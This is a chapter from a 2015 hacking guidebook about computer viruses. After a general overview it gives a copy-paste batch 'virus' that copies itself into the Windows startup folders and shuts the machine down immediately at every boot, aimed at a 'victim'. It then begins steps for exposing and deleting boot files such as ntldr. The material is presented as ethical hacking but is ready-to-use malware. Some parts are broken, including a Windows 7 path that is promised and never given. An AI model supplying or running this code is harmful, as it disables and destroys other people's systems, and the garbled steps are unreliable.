Hacking: Become The Ultimate Hacker - Computer Virus, Cracking, Malware, IT Security (2015)
Chapter 3: Computer Virus: Most Common Malware
In computing, the term virus is a small program or sometimes a mere piece of code that inserts itself with other important files like system files and boot files. Viruses replicate themselves and mostly stay hidden. The file or folder is said to be infected if it is affected by a virus. They are often harmful and rarely harmless. Harmful viruses perform activities like accessing sensitive information, stealing data, consuming system resources like CPU space and hard disk space etc., crippling the system and sometimes rendering them useless.
Vulnerability of different operating systems to viruses
Systems which run on Microsoft windows are the most vulnerable to most of the viruses. It is because of the wide usage of Windows desktops among the users of the world. The destructiveness of viruses or malware can be limited if diversified software are used for the systems of a network. Operating systems like Linux are open source and its users have a choice to use different packaging tools and different environments for the desktop; so, if at all a malware attacks the systems running on Linux, only a subset of the user group are affected. But in case of Windows, the applications run by the users are of the same set hence, which result in the rapid spreading of viruses among the systems running on Windows. These viruses target the same applications that are running on all the hosts. In case of the Mac operating system, it has not been attacked by any dangerous viruses in the last years. Windows are more vulnerable to viruses, and this fact is an important selling point for the Mac operating system.
You should be able to create viruses as a part of ethical hacking for vulnerability testing. Before trying out the codes to create a batch virus, you need to have a clear understanding of the batch files and their basics. You should also learn how to approach the code, to create viruses on your own. After that, all you need to do is just use notepad to write or the paste the code and give a .bat extension while saving the file.
What are Batch Files?
Let’s begin with a simple example, Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
Here we created a directory called ‘x’, and in it, we have created another directory called ‘y’.
Delete the folder ‘x’
What can batch viruses do?
They are used for many purposes. Some of them include formatting data, deleting windows files, annoying the victim, disabling the firewall, opening ports, format data, consuming CPU resources etc.
Here is a sample code for a batch virus. You will just need to copy the code given below into a notepad and save it with the extension '.bat'. The name of the file is up to you. The virus that we are creating here is a simple one and it does no harm to your system. But however it will shut your computer down as soon as it starts it.
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batch file in start-up folders (in XP)
shutdown -s -t 00 //this will shut down the computer in 0 seconds
Note: The above virus is a simple 'shutdown' virus. For removing it, you will need to log in from the safe mode and delete the file from the start-up folder where it was copied. The above path only works for windows XP. If you wish to run it in windows 7, you should use the following path.
Now every time the victim starts his computer, the batch file that we've created will get executed and will make the system shutdown immediately. (Time given is 0 seconds).
Deleting boot files
Follow the following steps for deleting the boot files.
· Follow the path C: Tools->Folder Option->View ( for windows xp)
· Uncheck the option 'Hide operating system files' and
· Check option 'Show hidden files and folders'.
· Click apply
With this, you'll be able to see the operating system files. There you should see a boot loader file 'ntldr'.